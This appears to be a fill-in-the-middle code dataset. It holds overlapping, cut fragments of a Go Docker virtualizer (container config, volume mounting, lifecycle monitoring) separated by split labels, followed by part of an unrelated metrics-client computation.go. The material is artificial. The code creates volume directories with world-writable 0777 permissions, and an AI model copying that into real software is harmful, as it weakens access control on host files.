glog.Warningf("Only one command supported. Found %d in userdata", len(ud.Cmds))
}
}
}
config = &container.Config{
Hostname: hostname,
Image: d.cfg.DockerImage,
Cmd: cmd,
}
hostConfig = &container.HostConfig{Binds: volumes}
if d.cfg.Mem > 0 {
// Docker memory limit is in bytes.
hostConfig.Memory = int64(1024 * 1024 * d.cfg.Mem)
}
if d.cfg.Cpus > 0 {
// CFS quota period - default to 100ms.
hostConfig.CPUPeriod = 100 * 1000
hostConfig.CPUQuota = hostConfig.CPUPeriod * int64(d.cfg.Cpus)
}
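// Worked example (illustrative values): Mem=512 yields a 536870912 byte (512 MiB) memory
// limit, and Cpus=2 yields CPUQuota=200000 against the 100000 microsecond CFS period,
// i.e. the container may consume up to two full CPUs.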
networkConfig = &network.NetworkingConfig{}
if bridge != "" {
config.MacAddress = d.cfg.VnicMAC
hostConfig.NetworkMode = container.NetworkMode(bridge)
networkConfig.EndpointsConfig = map[string]*network.EndpointSettings{
bridge: {
IPAMConfig: &network.EndpointIPAMConfig{
IPv4Address: d.cfg.VnicIP,
},
},
}
}
return
}
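// Illustrative (assumed) inputs for createConfigs above: the meta-data is JSON and may
// carry a hostname, e.g. {"hostname": "example-instance"}; the user-data is cloud-init
// style YAML whose first runcmd entry becomes the container command, e.g.
//
//	runcmd:
//	  - ["/bin/sh", "-c", "echo hello"]
//
// Any additional runcmd entries are ignored with a warning.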
func (d *docker) umountVolumes(vols []volumeConfig) {
for _, vol := range vols {
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err := d.mount.Unmount(vd, 0); err != nil {
glog.Warningf("Unable to unmount %s: %v", vd, err)
continue
|
}
glog.Infof("%s successfully unmounted", vol.UUID)
}
}
func (d *docker) unmapVolumes() {
for _, vol := range d.cfg.Volumes {
if err := d.storageDriver.UnmapVolumeFromNode(vol.UUID); err != nil {
glog.Warningf("Unable to unmap %s: %v", vol.UUID, err)
continue
}
glog.Infof("Unmapping volume %s", vol.UUID)
}
}
func (d *docker) mapAndMountVolumes() error {
for mapped, vol := range d.cfg.Volumes {
var devName string
var err error
if devName, err = d.storageDriver.MapVolumeToNode(vol.UUID); err != nil {
d.umountVolumes(d.cfg.Volumes[:mapped])
return fmt.Errorf("Unable to map (%s) %v", vol.UUID, err)
}
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err = d.mount.Mount(devName, vd); err != nil {
d.umountVolumes(d.cfg.Volumes[:mapped])
return fmt.Errorf("Unable to mount (%s) %v", vol.UUID, err)
}
}
return nil
}
func (d *docker) prepareVolumes() ([]string, error) {
var err error
volumes := make([]string, len(d.cfg.Volumes))
for _, vol := range d.cfg.Volumes {
if vol.Bootable {
return nil, fmt.Errorf("Cannot attach bootable volumes to containers")
}
}
for i, vol := range d.cfg.Volumes {
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err = os.MkdirAll(vd, 0777); err != nil {
return nil, fmt.Errorf("Unable to create instances directory (%s) %v",
instancesDir, err)
}
volumes[i] = fmt.Sprintf("%s:/volumes/%s", vd, vol.UUID)
}
return volumes, nil
}
func (d *docker) createImage(bridge string, userData, metaData []byte) error {
err := d.initDockerClient()
if err != nil {
return err
}
volumes, err := d.prepareVolumes()
if err != nil {
glog.Errorf("Unable to mount container volumes %v", err)
return err
}
config, hostConfig, networkConfig := d.createConfigs(bridge, userData, metaData, volumes)
resp, err := d.cli.ContainerCreate(context.Background(), config, hostConfig, networkConfig,
d.cfg.Instance)
if err != nil {
glog.Errorf("Unable to create container %v", err)
return err
}
idPath := path.Join(d.instanceDir, "docker-id")
err = ioutil.WriteFile(idPath, []byte(resp.ID), 0600)
if err != nil {
glog.Errorf("Unable to store docker container ID %v", err)
_ = dockerDeleteContainer(d.cli, resp.ID, d.cfg.Instance)
return err
}
d.dockerID = resp.ID
// This value is configurable. Need to figure out how to get it from docker.
d.cfg.Disk = 10000
return nil
}
func dockerDeleteContainer(cli containerManager, dockerID, instanceUUID string) error {
err := cli.ContainerRemove(context.Background(),
types.ContainerRemoveOptions{
ContainerID: dockerID,
Force: true})
if err != nil {
glog.Warningf("Unable to delete docker instance %s:%s err %v",
instanceUUID, dockerID, err)
}
return err
}
func (d *docker) deleteImage() error {
if d.dockerID == "" {
return nil
}
err := d.initDockerClient()
if err != nil {
return err
}
return dockerDeleteContainer(d.cli, d.dockerID, d.cfg.Instance)
}
func (d *docker) startVM(vnicName, ipAddress, cephID string) error {
err := d.initDockerClient()
if err != nil {
return err
}
err = d.mapAndMountVolumes()
if err != nil {
glog.Errorf("Unable to map container volumes: %v", err)
return err
}
err = d.cli.ContainerStart(context.Background(), d.dockerID)
if err != nil {
d.umountVolumes(d.cfg.Volumes)
d.unmapVolumes()
glog.Errorf("Unable to start container %v", err)
return err
}
return nil
}
|
random_line_split
|
|
docker.go
|
0 {
// CFS quota period - default to 100ms.
hostConfig.CPUPeriod = 100 * 1000
hostConfig.CPUQuota = hostConfig.CPUPeriod * int64(d.cfg.Cpus)
}
networkConfig = &network.NetworkingConfig{}
if bridge != "" {
config.MacAddress = d.cfg.VnicMAC
hostConfig.NetworkMode = container.NetworkMode(bridge)
networkConfig.EndpointsConfig = map[string]*network.EndpointSettings{
bridge: {
IPAMConfig: &network.EndpointIPAMConfig{
IPv4Address: d.cfg.VnicIP,
},
},
}
}
return
}
func (d *docker) umountVolumes(vols []volumeConfig) {
for _, vol := range vols {
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err := d.mount.Unmount(vd, 0); err != nil {
glog.Warningf("Unable to unmount %s: %v", vd, err)
continue
}
glog.Infof("%s successfully unmounted", vol.UUID)
}
}
func (d *docker) unmapVolumes() {
for _, vol := range d.cfg.Volumes {
if err := d.storageDriver.UnmapVolumeFromNode(vol.UUID); err != nil {
glog.Warningf("Unable to unmap %s: %v", vol.UUID, err)
continue
}
glog.Infof("Unmapping volume %s", vol.UUID)
}
}
func (d *docker) mapAndMountVolumes() error {
for mapped, vol := range d.cfg.Volumes {
var devName string
var err error
if devName, err = d.storageDriver.MapVolumeToNode(vol.UUID); err != nil {
d.umountVolumes(d.cfg.Volumes[:mapped])
return fmt.Errorf("Unable to map (%s) %v", vol.UUID, err)
}
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err = d.mount.Mount(devName, vd); err != nil {
d.umountVolumes(d.cfg.Volumes[:mapped])
return fmt.Errorf("Unable to mount (%s) %v", vol.UUID, err)
}
}
return nil
}
func (d *docker) prepareVolumes() ([]string, error) {
var err error
volumes := make([]string, len(d.cfg.Volumes))
for _, vol := range d.cfg.Volumes {
if vol.Bootable {
return nil, fmt.Errorf("Cannot attach bootable volumes to containers")
}
}
for i, vol := range d.cfg.Volumes {
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err = os.MkdirAll(vd, 0777); err != nil {
return nil, fmt.Errorf("Unable to create instances directory (%s) %v",
instancesDir, err)
}
volumes[i] = fmt.Sprintf("%s:/volumes/%s", vd, vol.UUID)
}
return volumes, nil
}
func (d *docker) createImage(bridge string, userData, metaData []byte) error {
err := d.initDockerClient()
if err != nil {
return err
}
volumes, err := d.prepareVolumes()
if err != nil {
glog.Errorf("Unable to mount container volumes %v", err)
return err
}
config, hostConfig, networkConfig := d.createConfigs(bridge, userData, metaData, volumes)
resp, err := d.cli.ContainerCreate(context.Background(), config, hostConfig, networkConfig,
d.cfg.Instance)
if err != nil {
glog.Errorf("Unable to create container %v", err)
return err
}
idPath := path.Join(d.instanceDir, "docker-id")
err = ioutil.WriteFile(idPath, []byte(resp.ID), 0600)
if err != nil {
glog.Errorf("Unable to store docker container ID %v", err)
_ = dockerDeleteContainer(d.cli, resp.ID, d.cfg.Instance)
return err
}
d.dockerID = resp.ID
// This value is configurable. Need to figure out how to get it from docker.
d.cfg.Disk = 10000
return nil
}
func dockerDeleteContainer(cli containerManager, dockerID, instanceUUID string) error {
err := cli.ContainerRemove(context.Background(),
types.ContainerRemoveOptions{
ContainerID: dockerID,
Force: true})
if err != nil {
glog.Warningf("Unable to delete docker instance %s:%s err %v",
instanceUUID, dockerID, err)
}
return err
}
func (d *docker) deleteImage() error {
if d.dockerID == "" {
return nil
}
err := d.initDockerClient()
if err != nil {
return err
}
return dockerDeleteContainer(d.cli, d.dockerID, d.cfg.Instance)
}
func (d *docker) startVM(vnicName, ipAddress, cephID string) error {
err := d.initDockerClient()
if err != nil {
return err
}
err = d.mapAndMountVolumes()
if err != nil {
glog.Errorf("Unable to map container volumes: %v", err)
return err
}
err = d.cli.ContainerStart(context.Background(), d.dockerID)
if err != nil {
d.umountVolumes(d.cfg.Volumes)
d.unmapVolumes()
glog.Errorf("Unable to start container %v", err)
return err
}
return nil
}
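// dockerCommandLoop blocks until the container exits, servicing commands received on
// dockerChannel in the meantime: a stop command kills the container, attach and detach
// requests are rejected as unsupported for containers, and closing the channel cancels
// the underlying ContainerWait.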
func dockerCommandLoop(cli containerManager, dockerChannel chan interface{}, instance, dockerID string) {
ctx, cancelFunc := context.WithCancel(context.Background())
lostContainerCh := make(chan struct{})
go func() {
defer close(lostContainerCh)
ret, err := cli.ContainerWait(ctx, dockerID)
glog.Infof("Instance %s:%s exitted with code %d err %v",
instance, dockerID, ret, err)
}()
DONE:
for {
select {
case _, _ = <-lostContainerCh:
break DONE
case cmd, ok := <-dockerChannel:
if !ok {
glog.Info("Cancelling Wait")
cancelFunc()
_ = <-lostContainerCh
break DONE
}
switch cmd := cmd.(type) {
case virtualizerStopCmd:
err := cli.ContainerKill(context.Background(), dockerID, "KILL")
if err != nil {
glog.Errorf("Unable to stop instance %s:%s: %v", instance, dockerID, err)
}
case virtualizerAttachCmd:
err := fmt.Errorf("Live Attach of volumes not supported for containers")
cmd.responseCh <- err
case virtualizerDetachCmd:
err := fmt.Errorf("Live Detach of volumes not supported for containers")
cmd.responseCh <- err
}
}
}
cancelFunc()
glog.Infof("Docker Instance %s:%s shut down", instance, dockerID)
}
func dockerConnect(cli containerManager, dockerChannel chan interface{}, instance,
dockerID string, closedCh chan struct{}, connectedCh chan struct{},
wg *sync.WaitGroup, boot bool) {
defer func() {
if closedCh != nil {
close(closedCh)
}
glog.Infof("Monitor function for %s exitting", instance)
wg.Done()
}()
// BUG(markus): Need a way to cancel this. Can't do this until we have contexts
con, err := cli.ContainerInspect(context.Background(), dockerID)
if err != nil {
glog.Errorf("Unable to determine status of instance %s:%s: %v", instance, dockerID, err)
return
}
if !con.State.Running && !con.State.Paused && !con.State.Restarting {
glog.Infof("Docker Instance %s:%s is not running", instance, dockerID)
return
}
close(connectedCh)
dockerCommandLoop(cli, dockerChannel, instance, dockerID)
}
func (d *docker) monitorVM(closedCh chan struct{}, connectedCh chan struct{},
wg *sync.WaitGroup, boot bool) chan interface{} {
if d.dockerID == "" {
idPath := path.Join(d.instanceDir, "docker-id")
data, err := ioutil.ReadFile(idPath)
if err != nil {
// We'll return an error later on in dockerConnect
glog.Errorf("Unable to read docker container ID %v", err)
} else {
d.dockerID = string(data)
glog.Infof("Instance UUID %s -> Docker UUID %s", d.cfg.Instance, d.dockerID)
}
}
dockerChannel := make(chan interface{})
wg.Add(1)
go dockerConnect(d.cli, dockerChannel, d.cfg.Instance, d.dockerID, closedCh, connectedCh, wg, boot)
return dockerChannel
}
func (d *docker) computeInstanceDiskspace() int {
if d.dockerID == "" {
return -1
}
err := d.initDockerClient()
if err != nil {
return -1
}
con, _, err := d.cli.ContainerInspectWithRaw(context.Background(), d.dockerID, true)
if err != nil {
glog.Errorf("Unable to determine status of instance %s:%s: %v", d.cfg.Instance,
d.dockerID, err)
return -1
}
if con.SizeRootFs == nil
|
{
return -1
}
|
conditional_block
|
|
docker.go
|
{
if d.cli != nil {
return nil
}
cli, err := getDockerClient()
if err != nil {
return fmt.Errorf("Unable to init docker client: %v", err)
}
d.cli = cli
return nil
}
func (d *docker) checkBackingImage() error {
glog.Infof("Checking backing docker image %s", d.cfg.DockerImage)
args := filters.NewArgs()
images, err := d.cli.ImageList(context.Background(),
types.ImageListOptions{
MatchName: d.cfg.DockerImage,
All: false,
Filters: args,
})
if err != nil {
glog.Infof("Called to ImageList for %s failed: %v", d.cfg.DockerImage, err)
return err
}
if len(images) == 0 {
glog.Infof("Docker Image not found %s", d.cfg.DockerImage)
return errImageNotFound
}
glog.Infof("Docker Image %s is present on node", d.cfg.DockerImage)
return nil
}
func (d *docker) ensureBackingImage() error {
glog.Infof("Downloading backing docker image %s", d.cfg.DockerImage)
err := d.initDockerClient()
if err != nil {
return err
}
err = d.checkBackingImage()
if err == nil {
return nil
} else if err != errImageNotFound {
glog.Errorf("Backing image check failed")
return err
}
glog.Infof("Backing image not found. Trying to download")
prog, err := d.cli.ImagePull(context.Background(), types.ImagePullOptions{ImageID: d.cfg.DockerImage}, nil)
if err != nil {
glog.Errorf("Unable to download image %s: %v\n", d.cfg.DockerImage, err)
return err
}
defer func() { _ = prog.Close() }()
dec := json.NewDecoder(prog)
var msg jsonmessage.JSONMessage
err = dec.Decode(&msg)
for err == nil {
if msg.Error != nil {
err = msg.Error
break
}
err = dec.Decode(&msg)
}
if err != nil && err != io.EOF {
glog.Errorf("Unable to download image : %v\n", err)
return err
}
return nil
}
func (d *docker) createConfigs(bridge string, userData, metaData []byte, volumes []string) (config *container.Config,
hostConfig *container.HostConfig, networkConfig *network.NetworkingConfig) {
var hostname string
var cmd []string
md := &struct {
Hostname string `json:"hostname"`
}{}
err := json.Unmarshal(metaData, md)
if err != nil {
glog.Info("Start command does not contain hostname. Setting to instance UUID")
hostname = d.cfg.Instance
} else {
glog.Infof("Found hostname %s", md.Hostname)
hostname = md.Hostname
}
ud := &struct {
Cmds [][]string `yaml:"runcmd"`
}{}
err = yaml.Unmarshal(userData, ud)
if err != nil {
glog.Info("Start command does not contain a run command")
} else {
if len(ud.Cmds) >= 1 {
cmd = ud.Cmds[0]
if len(ud.Cmds) > 1 {
glog.Warningf("Only one command supported. Found %d in userdata", len(ud.Cmds))
}
}
}
config = &container.Config{
Hostname: hostname,
Image: d.cfg.DockerImage,
Cmd: cmd,
}
hostConfig = &container.HostConfig{Binds: volumes}
if d.cfg.Mem > 0 {
// Docker memory limit is in bytes.
hostConfig.Memory = int64(1024 * 1024 * d.cfg.Mem)
}
if d.cfg.Cpus > 0 {
// CFS quota period - default to 100ms.
hostConfig.CPUPeriod = 100 * 1000
hostConfig.CPUQuota = hostConfig.CPUPeriod * int64(d.cfg.Cpus)
}
networkConfig = &network.NetworkingConfig{}
if bridge != "" {
config.MacAddress = d.cfg.VnicMAC
hostConfig.NetworkMode = container.NetworkMode(bridge)
networkConfig.EndpointsConfig = map[string]*network.EndpointSettings{
bridge: {
IPAMConfig: &network.EndpointIPAMConfig{
IPv4Address: d.cfg.VnicIP,
},
},
}
}
return
}
func (d *docker) umountVolumes(vols []volumeConfig) {
for _, vol := range vols {
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err := d.mount.Unmount(vd, 0); err != nil {
glog.Warningf("Unable to unmount %s: %v", vd, err)
continue
}
glog.Infof("%s successfully unmounted", vol.UUID)
}
}
func (d *docker) unmapVolumes() {
for _, vol := range d.cfg.Volumes {
if err := d.storageDriver.UnmapVolumeFromNode(vol.UUID); err != nil {
glog.Warningf("Unable to unmap %s: %v", vol.UUID, err)
continue
}
glog.Infof("Unmapping volume %s", vol.UUID)
}
}
func (d *docker) mapAndMountVolumes() error {
for mapped, vol := range d.cfg.Volumes {
var devName string
var err error
if devName, err = d.storageDriver.MapVolumeToNode(vol.UUID); err != nil {
d.umountVolumes(d.cfg.Volumes[:mapped])
return fmt.Errorf("Unable to map (%s) %v", vol.UUID, err)
}
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err = d.mount.Mount(devName, vd); err != nil {
d.umountVolumes(d.cfg.Volumes[:mapped])
return fmt.Errorf("Unable to mount (%s) %v", vol.UUID, err)
}
}
return nil
}
func (d *docker) prepareVolumes() ([]string, error) {
var err error
volumes := make([]string, len(d.cfg.Volumes))
for _, vol := range d.cfg.Volumes {
if vol.Bootable {
return nil, fmt.Errorf("Cannot attach bootable volumes to containers")
}
}
for i, vol := range d.cfg.Volumes {
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err = os.MkdirAll(vd, 0777); err != nil {
return nil, fmt.Errorf("Unable to create instances directory (%s) %v",
instancesDir, err)
}
volumes[i] = fmt.Sprintf("%s:/volumes/%s", vd, vol.UUID)
}
return volumes, nil
}
func (d *docker) createImage(bridge string, userData, metaData []byte) error
|
idPath := path.Join(d.instanceDir, "docker-id")
err = ioutil.WriteFile(idPath, []byte(resp.ID), 0600)
if err != nil {
glog.Errorf("Unable to store docker container ID %v", err)
_ = dockerDeleteContainer(d.cli, resp.ID, d.cfg.Instance)
return err
}
d.dockerID = resp.ID
// This value is configurable. Need to figure out how to get it from docker.
d.cfg.Disk = 10000
return nil
}
func dockerDeleteContainer(cli containerManager, dockerID, instanceUUID string) error {
err := cli.ContainerRemove(context.Background(),
types.ContainerRemoveOptions{
ContainerID: dockerID,
Force: true})
if err != nil {
glog.Warningf("Unable to delete docker instance %s:%s err %v",
instanceUUID, dockerID, err)
}
return err
}
func (d *docker) deleteImage() error {
if d.dockerID == "" {
return nil
}
err := d.initDockerClient()
if err != nil {
return err
}
return dockerDeleteContainer(d.cli, d.dockerID, d.cfg.Instance)
}
func (d *docker) startVM(vnicName, ipAddress, cephID string) error {
err := d.initDockerClient()
if err != nil {
return err
}
err = d.mapAndMountVolumes()
if err != nil {
glog.Errorf("Unable to map container volumes: %v", err)
return err
}
err = d.cli.ContainerStart(context.Background(), d.dockerID)
if err != nil {
d.umountVolumes(d.cfg.Volumes)
d.unmapVolumes()
glog.Errorf("Unable to start container %v", err)
return err
}
return nil
|
{
err := d.initDockerClient()
if err != nil {
return err
}
volumes, err := d.prepareVolumes()
if err != nil {
glog.Errorf("Unable to mount container volumes %v", err)
return err
}
config, hostConfig, networkConfig := d.createConfigs(bridge, userData, metaData, volumes)
resp, err := d.cli.ContainerCreate(context.Background(), config, hostConfig, networkConfig,
d.cfg.Instance)
if err != nil {
glog.Errorf("Unable to create container %v", err)
return err
}
|
identifier_body
|
docker.go
|
cmd []string
md := &struct {
Hostname string `json:"hostname"`
}{}
err := json.Unmarshal(metaData, md)
if err != nil {
glog.Info("Start command does not contain hostname. Setting to instance UUID")
hostname = d.cfg.Instance
} else {
glog.Infof("Found hostname %s", md.Hostname)
hostname = md.Hostname
}
ud := &struct {
Cmds [][]string `yaml:"runcmd"`
}{}
err = yaml.Unmarshal(userData, ud)
if err != nil {
glog.Info("Start command does not contain a run command")
} else {
if len(ud.Cmds) >= 1 {
cmd = ud.Cmds[0]
if len(ud.Cmds) > 1 {
glog.Warningf("Only one command supported. Found %d in userdata", len(ud.Cmds))
}
}
}
config = &container.Config{
Hostname: hostname,
Image: d.cfg.DockerImage,
Cmd: cmd,
}
hostConfig = &container.HostConfig{Binds: volumes}
if d.cfg.Mem > 0 {
// Docker memory limit is in bytes.
hostConfig.Memory = int64(1024 * 1024 * d.cfg.Mem)
}
if d.cfg.Cpus > 0 {
// CFS quota period - default to 100ms.
hostConfig.CPUPeriod = 100 * 1000
hostConfig.CPUQuota = hostConfig.CPUPeriod * int64(d.cfg.Cpus)
}
networkConfig = &network.NetworkingConfig{}
if bridge != "" {
config.MacAddress = d.cfg.VnicMAC
hostConfig.NetworkMode = container.NetworkMode(bridge)
networkConfig.EndpointsConfig = map[string]*network.EndpointSettings{
bridge: {
IPAMConfig: &network.EndpointIPAMConfig{
IPv4Address: d.cfg.VnicIP,
},
},
}
}
return
}
func (d *docker) umountVolumes(vols []volumeConfig) {
for _, vol := range vols {
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err := d.mount.Unmount(vd, 0); err != nil {
glog.Warningf("Unable to unmount %s: %v", vd, err)
continue
}
glog.Infof("%s successfully unmounted", vol.UUID)
}
}
func (d *docker) unmapVolumes() {
for _, vol := range d.cfg.Volumes {
if err := d.storageDriver.UnmapVolumeFromNode(vol.UUID); err != nil {
glog.Warningf("Unable to unmap %s: %v", vol.UUID, err)
continue
}
glog.Infof("Unmapping volume %s", vol.UUID)
}
}
func (d *docker) mapAndMountVolumes() error {
for mapped, vol := range d.cfg.Volumes {
var devName string
var err error
if devName, err = d.storageDriver.MapVolumeToNode(vol.UUID); err != nil {
d.umountVolumes(d.cfg.Volumes[:mapped])
return fmt.Errorf("Unable to map (%s) %v", vol.UUID, err)
}
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err = d.mount.Mount(devName, vd); err != nil {
d.umountVolumes(d.cfg.Volumes[:mapped])
return fmt.Errorf("Unable to mount (%s) %v", vol.UUID, err)
}
}
return nil
}
func (d *docker) prepareVolumes() ([]string, error) {
var err error
volumes := make([]string, len(d.cfg.Volumes))
for _, vol := range d.cfg.Volumes {
if vol.Bootable {
return nil, fmt.Errorf("Cannot attach bootable volumes to containers")
}
}
for i, vol := range d.cfg.Volumes {
vd := path.Join(d.instanceDir, volumesDir, vol.UUID)
if err = os.MkdirAll(vd, 0777); err != nil {
return nil, fmt.Errorf("Unable to create instances directory (%s) %v",
instancesDir, err)
}
volumes[i] = fmt.Sprintf("%s:/volumes/%s", vd, vol.UUID)
}
return volumes, nil
}
func (d *docker) createImage(bridge string, userData, metaData []byte) error {
err := d.initDockerClient()
if err != nil {
return err
}
volumes, err := d.prepareVolumes()
if err != nil {
glog.Errorf("Unable to mount container volumes %v", err)
return err
}
config, hostConfig, networkConfig := d.createConfigs(bridge, userData, metaData, volumes)
resp, err := d.cli.ContainerCreate(context.Background(), config, hostConfig, networkConfig,
d.cfg.Instance)
if err != nil {
glog.Errorf("Unable to create container %v", err)
return err
}
idPath := path.Join(d.instanceDir, "docker-id")
err = ioutil.WriteFile(idPath, []byte(resp.ID), 0600)
if err != nil {
glog.Errorf("Unable to store docker container ID %v", err)
_ = dockerDeleteContainer(d.cli, resp.ID, d.cfg.Instance)
return err
}
d.dockerID = resp.ID
// This value is configurable. Need to figure out how to get it from docker.
d.cfg.Disk = 10000
return nil
}
func dockerDeleteContainer(cli containerManager, dockerID, instanceUUID string) error {
err := cli.ContainerRemove(context.Background(),
types.ContainerRemoveOptions{
ContainerID: dockerID,
Force: true})
if err != nil {
glog.Warningf("Unable to delete docker instance %s:%s err %v",
instanceUUID, dockerID, err)
}
return err
}
func (d *docker) deleteImage() error {
if d.dockerID == "" {
return nil
}
err := d.initDockerClient()
if err != nil {
return err
}
return dockerDeleteContainer(d.cli, d.dockerID, d.cfg.Instance)
}
func (d *docker) startVM(vnicName, ipAddress, cephID string) error {
err := d.initDockerClient()
if err != nil {
return err
}
err = d.mapAndMountVolumes()
if err != nil {
glog.Errorf("Unable to map container volumes: %v", err)
return err
}
err = d.cli.ContainerStart(context.Background(), d.dockerID)
if err != nil {
d.umountVolumes(d.cfg.Volumes)
d.unmapVolumes()
glog.Errorf("Unable to start container %v", err)
return err
}
return nil
}
func dockerCommandLoop(cli containerManager, dockerChannel chan interface{}, instance, dockerID string) {
ctx, cancelFunc := context.WithCancel(context.Background())
lostContainerCh := make(chan struct{})
go func() {
defer close(lostContainerCh)
ret, err := cli.ContainerWait(ctx, dockerID)
glog.Infof("Instance %s:%s exitted with code %d err %v",
instance, dockerID, ret, err)
}()
DONE:
for {
select {
case _, _ = <-lostContainerCh:
break DONE
case cmd, ok := <-dockerChannel:
if !ok {
glog.Info("Cancelling Wait")
cancelFunc()
_ = <-lostContainerCh
break DONE
}
switch cmd := cmd.(type) {
case virtualizerStopCmd:
err := cli.ContainerKill(context.Background(), dockerID, "KILL")
if err != nil {
glog.Errorf("Unable to stop instance %s:%s: %v", instance, dockerID, err)
}
case virtualizerAttachCmd:
err := fmt.Errorf("Live Attach of volumes not supported for containers")
cmd.responseCh <- err
case virtualizerDetachCmd:
err := fmt.Errorf("Live Detach of volumes not supported for containers")
cmd.responseCh <- err
}
}
}
cancelFunc()
glog.Infof("Docker Instance %s:%s shut down", instance, dockerID)
}
func dockerConnect(cli containerManager, dockerChannel chan interface{}, instance,
dockerID string, closedCh chan struct{}, connectedCh chan struct{},
wg *sync.WaitGroup, boot bool) {
defer func() {
if closedCh != nil {
close(closedCh)
}
glog.Infof("Monitor function for %s exitting", instance)
wg.Done()
}()
// BUG(markus): Need a way to cancel this. Can't do this until we have contexts
con, err := cli.ContainerInspect(context.Background(), dockerID)
if err != nil {
glog.Errorf("Unable to determine status of instance %s:%s: %v", instance, dockerID, err)
return
}
if !con.State.Running && !con.State.Paused && !con.State.Restarting {
glog.Infof("Docker Instance %s:%s is not running", instance, dockerID)
return
}
close(connectedCh)
dockerCommandLoop(cli, dockerChannel, instance, dockerID)
}
func (d *docker)
|
monitorVM
|
identifier_name
|
|
computation.go
|
limitSize asyncMetadata[int]
matchedNoTimeseriesQuery asyncMetadata[string]
groupByMissingProperties asyncMetadata[[]string]
tsidMetadata map[idtool.ID]*asyncMetadata[*messages.MetadataProperties]
}
// ComputationError exposes the underlying metadata of a computation error
type ComputationError struct {
Code int
Message string
ErrorType string
}
func (e *ComputationError) Error() string {
err := fmt.Sprintf("%v", e.Code)
if e.ErrorType != "" {
err = fmt.Sprintf("%v (%v)", e.Code, e.ErrorType)
|
}
return err
}
func newComputation(channel <-chan messages.Message, name string, client *Client) *Computation {
comp := &Computation{
channel: channel,
name: name,
client: client,
dataCh: make(chan *messages.DataMessage),
dataChBuffer: make(chan *messages.DataMessage),
eventCh: make(chan *messages.EventMessage),
eventChBuffer: make(chan *messages.EventMessage),
expirationCh: make(chan *messages.ExpiredTSIDMessage),
expirationChBuffer: make(chan *messages.ExpiredTSIDMessage),
tsidMetadata: make(map[idtool.ID]*asyncMetadata[*messages.MetadataProperties]),
}
go bufferMessages(comp.dataChBuffer, comp.dataCh)
go bufferMessages(comp.expirationChBuffer, comp.expirationCh)
go bufferMessages(comp.eventChBuffer, comp.eventCh)
go func() {
err := comp.watchMessages()
if !errors.Is(err, errChannelClosed) {
comp.errMutex.Lock()
comp.lastError = err
comp.errMutex.Unlock()
}
comp.shutdown()
}()
return comp
}
// Handle of the computation. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Handle(ctx context.Context) (string, error) {
return c.handle.Get(ctx)
}
// Resolution of the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Resolution(ctx context.Context) (time.Duration, error) {
resMS, err := c.resolutionMS.Get(ctx)
return time.Duration(resMS) * time.Millisecond, err
}
// Lag detected for the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Lag(ctx context.Context) (time.Duration, error) {
lagMS, err := c.lagMS.Get(ctx)
return time.Duration(lagMS) * time.Millisecond, err
}
// MaxDelay detected for the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) MaxDelay(ctx context.Context) (time.Duration, error) {
maxDelayMS, err := c.maxDelayMS.Get(ctx)
return time.Duration(maxDelayMS) * time.Millisecond, err
}
// MatchedSize detected for the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) MatchedSize(ctx context.Context) (int, error) {
return c.matchedSize.Get(ctx)
}
// LimitSize detected for the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) LimitSize(ctx context.Context) (int, error) {
return c.limitSize.Get(ctx)
}
// MatchedNoTimeseriesQuery if it matched no active timeseries. Will wait as long as the given ctx
// is not closed. If ctx is closed an error will be returned.
func (c *Computation) MatchedNoTimeseriesQuery(ctx context.Context) (string, error) {
return c.matchedNoTimeseriesQuery.Get(ctx)
}
// GroupByMissingProperties are timeseries that don't contain the required dimensions. Will wait as
// long as the given ctx is not closed. If ctx is closed an error will be returned.
func (c *Computation) GroupByMissingProperties(ctx context.Context) ([]string, error) {
return c.groupByMissingProperties.Get(ctx)
}
// TSIDMetadata for a particular tsid. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) TSIDMetadata(ctx context.Context, tsid idtool.ID) (*messages.MetadataProperties, error) {
c.Lock()
if _, ok := c.tsidMetadata[tsid]; !ok {
c.tsidMetadata[tsid] = &asyncMetadata[*messages.MetadataProperties]{}
}
md := c.tsidMetadata[tsid]
c.Unlock()
return md.Get(ctx)
}
// Err returns the last fatal error that caused the computation to stop, if
// any. Will be nil if the computation stopped in an expected manner.
func (c *Computation) Err() error {
c.errMutex.RLock()
defer c.errMutex.RUnlock()
return c.lastError
}
func (c *Computation) watchMessages() error {
for {
m, ok := <-c.channel
if !ok {
return nil
}
if err := c.processMessage(m); err != nil {
return err
}
}
}
var errChannelClosed = errors.New("computation channel is closed")
func (c *Computation) processMessage(m messages.Message) error {
switch v := m.(type) {
case *messages.JobStartControlMessage:
c.handle.Set(v.Handle)
case *messages.EndOfChannelControlMessage, *messages.ChannelAbortControlMessage:
return errChannelClosed
case *messages.DataMessage:
c.dataChBuffer <- v
case *messages.ExpiredTSIDMessage:
c.Lock()
delete(c.tsidMetadata, idtool.IDFromString(v.TSID))
c.Unlock()
c.expirationChBuffer <- v
case *messages.InfoMessage:
switch v.MessageBlock.Code {
case messages.JobRunningResolution:
c.resolutionMS.Set(v.MessageBlock.Contents.(messages.JobRunningResolutionContents).ResolutionMS())
case messages.JobDetectedLag:
c.lagMS.Set(v.MessageBlock.Contents.(messages.JobDetectedLagContents).LagMS())
case messages.JobInitialMaxDelay:
c.maxDelayMS.Set(v.MessageBlock.Contents.(messages.JobInitialMaxDelayContents).MaxDelayMS())
case messages.FindLimitedResultSet:
c.matchedSize.Set(v.MessageBlock.Contents.(messages.FindLimitedResultSetContents).MatchedSize())
